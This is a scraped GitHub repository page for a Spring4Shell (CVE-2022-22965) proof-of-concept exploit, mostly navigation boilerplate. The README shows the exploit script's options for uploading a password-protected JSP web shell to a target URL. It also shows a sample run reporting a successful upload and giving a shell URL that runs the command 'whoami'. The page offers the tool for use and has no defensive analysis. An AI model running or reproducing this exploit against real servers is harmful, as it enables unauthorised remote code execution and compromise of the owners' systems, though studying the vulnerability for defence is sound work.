Spring4Shell-CVE-2022-22965-POC

ghost㉿uchiha:~$ ./exploit.py --help                                     
usage: exploit.py [-h] [-f FILENAME] [-p PASSWORD] [-d DIRECTORY] url

Spring4Shell RCE Proof of Concept

positional arguments:
  url                   Target URL

options:
  -h, --help            show this help message and exit
  -f FILENAME, --filename FILENAME
                        Name of the file to upload (Default tomcatwar.jsp)
  -p PASSWORD, --password PASSWORD
                        Password to protect the shell with (Default: thm)
  -d DIRECTORY, --directory DIRECTORY
                        The upload path for the file (Default: ROOT)

Usage

ghost㉿uchiha:~$ ./exploit.py http://url/
Shell Uploaded Successfully!
Your shell can be found at: http://url/tomcatwar.jsp?pwd=evil&cmd=whoami

Modified version of https://github.com/BobTheShoplifter/Spring4Shell-POC

Name		Name	Last commit message	Last commit date
Latest commit History 10 Commits
.gitattributes		.gitattributes
README.md		README.md
exploit.py		exploit.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

.gitattributes

.gitattributes

README.md

README.md

exploit.py

exploit.py

Repository files navigation

Spring4Shell-CVE-2022-22965-POC

Usage

About

Releases

Packages

Languages

ajith737/Spring4Shell-CVE-2022-22965-POC

Folders and files

Latest commit

History

Repository files navigation

Spring4Shell-CVE-2022-22965-POC

Usage

About

Resources

Stars

Watchers

Forks

Languages